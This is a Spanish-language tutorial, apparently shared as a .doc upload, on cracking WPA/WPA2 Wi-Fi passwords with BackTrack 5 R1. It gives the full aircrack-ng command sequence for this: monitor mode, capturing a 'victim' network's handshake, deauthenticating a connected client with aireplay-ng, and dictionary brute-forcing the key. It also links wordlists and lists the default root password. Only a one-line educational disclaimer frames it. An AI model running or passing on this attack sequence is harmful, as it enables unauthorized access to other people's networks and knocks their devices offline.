Hackear Claves wpa con Backtrack 5 R1 Revolution.doc
-
Upload
ghostboywm -
Category
Documents
-
view
39 -
download
0
Transcript of Hackear Claves wpa con Backtrack 5 R1 Revolution.doc
Hackear Claves wpa con Backtrack 5 R1 Revolution
Qué tal compas de t¡ en esta ocación regreso con un tutorial de auditoria de redes para sacar claves de encriptación wpa/wpa2.
Este Post es con fines Educativos y/o Didácticos, no me hago responsable por el uso malicioso.
Bueno, cómo dice el pollo: Vamos al grano ñ_ñ
1.- El primer paso es poner la targeta inalámbrica en modo monitor (monitor mode enabled): airmon-ng start wlan0
2.- Ahora vamos a buscar redes disponibles para eso ejecutamos el siguiente comando:
airodump-ng mon0
3.- Aqui vamos a capturar la red víctima para posteriormente obtener el "Handshake" airodump-ng -w red --bssid 00:11:22:33:44:55 -c 11 mon0
Donde:
-w = nombre del archivo .cap (donde se guarda la captura)
--bssid = dirección mac de la red víctima
-c = canal de la red víctima
Tenemos qué tener un cliente conectado en la red víctima, para sacar el "Handshake"
4.- Ahora abrimos una 2° Terminal y vamos a capturar el "Handshake". el handshake es un paquete especial qué se recibe cuando se conecta al modem. Tenemos qué desconectar al cliente (station) Para esto ejecutamos el siguiente comando:
aireplay-ng --deauth 20 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0
Donde:
--deauth = representa las veces qué se desconecta al dispositivo (station)
-a = señala la dirección mac de la red víctima
-c = señala la dirección mac del cliente a desconectar
5.- Vamos a comprobar si capturamos el "handshake" para esto vamos a la primera terminal y nos fijamos en la parte superior derecha (a un lado de la fecha y hora) lo siguiente: "WPA handshake"
Una vez capturado el "handshake" procedemos a hacer el ataque con el diccionario a fuerza bruta, para esto se necesitan los diccionarios. A continuación les dejo los links:
Son 10 diccionarios por Mediafire:http://www.mediafire.com/?h1knd353a0mvdxr
6.- Ya qué tengamos los diccionarios, procedemos a ejecutar aircrack-ng
aircrack-ng -a 2 -w ruta/al/diccionario red-01.cap
Y esperan a qué consiga la clave, ya saben si no les funciona prueben otro y sean pacientes.
¡TODO DEPENDE DE USTEDES! SUERTE.......
Bueno eso ha sido todo por este post, comenten, Síganme los buenos y agreguenlo a favoritos y unos puntos...
Modo Gráfico:
User$: rootPassword$: toor$ Startx